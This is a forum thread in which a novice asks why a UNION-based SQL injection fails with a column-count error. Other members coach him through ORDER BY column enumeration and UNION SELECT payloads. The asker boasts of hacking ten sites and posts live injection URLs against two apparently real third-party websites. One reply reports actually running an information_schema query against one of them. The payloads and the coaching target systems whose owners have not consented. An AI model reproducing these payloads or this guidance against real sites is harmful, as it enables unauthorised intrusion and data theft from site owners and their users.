Howdy, Stranger!
It looks like you're new here. If you want to get involved, click one of these buttons!
Top Posters
Who's Online (0)
Powered by Vanilla.
Made with Bootstrap.
What does this error mean when injectng?
-
so i learning more and i came across this error on a number of sites.
error - The used SELECT statements have a different number of columns
What does it mean???
How do i get by this?Skype: mrpt3oTwitter: MrPteo
-
Whats the url your injecting?
-
p-teo, when doing SQL injections involving a union, the number of columns you use with your new query must be the same number of columns as that from the old query to be unioned with.
so if the original query is:
SELECT name, id FROM members WHERE email='$var'
Your injection should be:
SELECT name, id FROM members WHERE email='' UNION ALL SELECT 1,2 from to_hack--
simply put, if the original number of columns is 2, your union select must also have 2 columns. Same number of columns is important. :)
Well, that's the short answer. -
This is an example of what im talking about, the site has 5 but when i put next injection in it gives the error
http://www.maxprotech.com/maxpro-product-detail.php?id=-370002%20union%20all%20select%201,2,3,4,5--Skype: mrpt3oTwitter: MrPteo -
the site may have multiple queries and one may have 5 columns and another may have a different amount
-
^ so how would you go about injecting into a site with this error???Skype: mrpt3oTwitter: MrPteo
-
^ so how would you go about injecting into a site with this error???
Use:
order by #--
so at the end of your query, just go:
Example:
?id=1 order by 1--
?id=1 order by 2--
...
?id=1 order by n--
Where n is a number such that {order by n+1} will already yield an error. Thus, n is the number of columns in your original query, and will also be the number of columns you need in your union select query. -
just hows you've been doing it at the moment p-teo.
-
^ so how would you go about injecting into a site with this error???
Use:
order by #--
so at the end of your query, just go:
Example:
?id=1 order by 1--
?id=1 order by 2--
...
?id=1 order by n--
Where n is a number such that {order by n+1} will already yield an error. Thus, n is the number of columns in your original query, and will also be the number of columns you need in your union select query.
i understand you on that but when you do union all select 1,2,...
would you simply put - union all select n--
and then union all select @@version etc, because that looks like it wouldnt work.
sh3llC0de Iv been fine, hacked 10 sites yesturday and today, now im trying to figure this outSkype: mrpt3oTwitter: MrPteo -
^ so how would you go about injecting into a site with this error???
Use:
order by #--
so at the end of your query, just go:
Example:
?id=1 order by 1--
?id=1 order by 2--
...
?id=1 order by n--
Where n is a number such that {order by n+1} will already yield an error. Thus, n is the number of columns in your original query, and will also be the number of columns you need in your union select query.
i understand you on that but when you do union all select 1,2,...
would you simply put - union all select n--
and then union all select @@version etc, because that looks like it wouldnt work.
sh3llC0de Iv been fine, hacked 10 sites yesturday and today, now im trying to figure this out
Not union all select n but union all select 1,2,...,n-- -
Okay, i think i understand now, thank you very muchSkype: mrpt3oTwitter: MrPteo
-
-
Found another vuln like that, lol i was actually looking for RFI vulns at the time, can anyone help me exploit this and teach me how to do it??
http://www.shacabka.net/view.php?id=8255%20union%20all%20select%201,2,3,4,5,6,7--
thanks to anyone that helpsSkype: mrpt3oTwitter: MrPteo -
Found another vuln like that, lol i was actually looking for RFI vulns at the time, can anyone help me exploit this and teach me how to do it??
http://www.shacabka.net/view.php?id=8255%20union%20all%20select%201,2,3,4,5,6,7--
thanks to anyone that helps
p-teo, I suggest you do the SQL challenges in security override to test your skill. And then the SQL challenge at thisislegal.com (SQL 2)
EDIT: Tried the site you linked. I ended up with this:
http://www.shacabka.net/view.php?id=8255 union all select * from information_schema.tables--
Access is denied though, so I'd suggest you devise a way to get the names of tables. :)
If you've done those, I think it's safe to say you know the basics of SQLi. And once you do, that site shouldn't be much of a problem to you. :)
